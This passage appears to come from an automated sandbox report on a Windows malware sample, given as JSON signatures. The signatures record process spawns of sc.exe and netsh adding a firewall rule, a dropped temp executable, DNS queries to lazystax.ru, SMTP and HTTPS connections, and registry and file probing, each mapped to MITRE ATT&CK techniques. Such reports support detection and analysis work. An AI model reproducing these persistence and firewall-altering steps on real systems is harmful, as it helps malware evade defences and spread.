00000000-00006128), Spawned process \"sc.exe\" with commandline \"start tpxhoiko\" (UID: 00000000-00005936), Spawned process \"chrmgspr.exe\" with commandline \"/d\"C:\\\\888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2d ...\" (UID: 00000000-00004084)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00004288), Spawned process \"svchost.exe\" (UID: 00000000-00004144)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"chrmgspr.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"chrmgspr.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"chrmgspr.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67EE524C.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67EE524C.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67EE524C.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.67EE524C.bin\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9\" has an executable section named \".text\"\n \"chrmgspr.exe\" has an executable section named \".text\"\n \"DISMHOST.EXE.67EE524C.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9\" has an writable section named \".data\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9\" has an writable section named \".text\"\n \"chrmgspr.exe\" has an writable section named \".data\"\n \"chrmgspr.exe\" has an writable section named \".text\"\n \"DISMHOST.EXE.67EE524C.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xa2e000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xe02000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"chrmgspr.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"DISMHOST.EXE.67EE524C.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9\" was detected as \"VC8 -> Microsoft Corporation\"\n \"chrmgspr.exe\" was detected as \"VC8 -> Microsoft Corporation\"\n \"DISMHOST.EXE.67EE524C.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"chrmgspr.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\chrmgspr.exe]- [targetUID: 00000000-00006072]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"chrmgspr.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" reads file \"c:\\888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe.Local\\\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\888C11E124610C7AF11109F3B28F1046C0123DAAF6CE5DA755D192D2DD1305F9.EXE.LOCAL\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\chrmgspr.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"888C11E124610C7AF11109F3B28F1046C0123DAAF6CE5DA755D192D2DD1305F9\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"COM+ENABLED\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"INPROCSERVER32\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"THREADINGMODEL\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"MAXSXSHASHCOUNT\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: 